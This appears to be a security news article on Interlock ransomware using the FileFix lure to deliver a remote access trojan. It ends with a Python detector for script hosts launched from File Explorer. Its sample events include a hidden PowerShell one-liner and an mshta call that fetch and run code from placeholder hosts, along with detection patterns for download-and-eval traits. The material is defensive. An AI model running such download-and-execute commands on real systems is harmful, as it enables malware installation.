
Interlock ransomware adopts new FileFix attack to push malware


Hackers have adopted the new technique called 'FileFix' in Interlock ransomware attacks to drop a remote access trojan (RAT) on targeted systems.

Interlock ransomware operations have increased over the past months as the threat actor started using the KongTuke web injector (aka 'LandUpdate808') to deliver payloads through compromised websites.

This shift in modus operandi was observed by researchers at The DFIR Report and Proofpoint since May. Back then, visitors to compromised sites were prompted to pass a fake CAPTCHA verification and then paste content that had been automatically copied to the clipboard into a Run dialog, a tactic consistent with ClickFix attacks.

The trick led users to execute a PowerShell script that fetched and launched a Node.js-based variant of the Interlock RAT.

In June, researchers found a PHP-based variant of Interlock RAT used in the wild, which was delivered using the same KongTuke injector.

Earlier this month, a significant change in the delivery wrapper occurred, with Interlock switching to the FileFix variation of the ClickFix method as its preferred delivery mechanism.

Interlock's FileFix attack

Source: The DFIR Report

FileFix is a social engineering attack technique developed by security researcher mr.d0x. It's an evolution of the ClickFix attack, which became one of the most widely employed payload distribution methods over the past year.

In the FileFix variation, the attacker weaponizes trusted Windows UI elements, such as File Explorer and HTML Applications (.HTA), to trick users into executing malicious PowerShell or JavaScript code without displaying any security warnings.
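Because both ClickFix and FileFix end with the victim launching a script host from a trusted shell element, the process tree is where defenders can look. The detector below is an added example, not code from the article or from The DFIR Report; it scores constructed Sysmon-style process-creation events (field names and sample values are assumptions) and flags script hosts spawned by explorer.exe only when the command line also carries traits typical of a pasted one-liner.

```python
import re

# Script hosts that a FileFix (File Explorer / .HTA) or ClickFix (Run dialog) lure ends up launching.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Both lures hand the command to the shell, so the child process is parented by explorer.exe.
UI_PARENTS = {"explorer.exe"}
# Command-line traits a pasted one-liner usually carries; explorer.exe as parent alone is
# normal for any interactive launch, so these are required to keep the check quiet.
SUSPICIOUS = [
    (r"-(w|windowstyle)\s+hidden", "hidden window"),
    (r"-(e|enc|encodedcommand)\b", "encoded command"),
    (r"\b(iwr|invoke-webrequest|downloadstring|invoke-expression|iex)\b", "download/eval"),
    (r"\bhttps?://", "remote URL"),
]

def score_event(event: dict) -> list[str]:
    """Return the reasons a process-creation event looks like a FileFix/ClickFix launch."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS or parent not in UI_PARENTS:
        return []
    reasons = [label for pattern, label in SUSPICIOUS
               if re.search(pattern, event["CommandLine"], re.IGNORECASE)]
    # PowerShell is launched interactively all the time, so demand two independent traits;
    # mshta/wscript/cscript parented by the shell need only one.
    threshold = 2 if image in {"powershell.exe", "pwsh.exe"} else 1
    return reasons if len(reasons) >= threshold else []

def find_suspicious(events: list) -> list:
    """Return (ProcessId, reasons) for every event the scorer flags."""
    return [(e["ProcessId"], score_event(e)) for e in events if score_event(e)]

# Constructed sample events (not real telemetry); the URL host is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 5208, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},  # user simply opened a console: benign
    {"ProcessId": 5300, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr https://EXAMPLE-PLACEHOLDER/x | iex"'},
    {"ProcessId": 5412, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "mshta.exe https://EXAMPLE-PLACEHOLDER/p.hta"},
]

if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_EVENTS):
        print(pid, reasons)
```

Tune the trait list and thresholds to your environment; the point is the combination of shell parent plus one-liner traits, not any single pattern.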
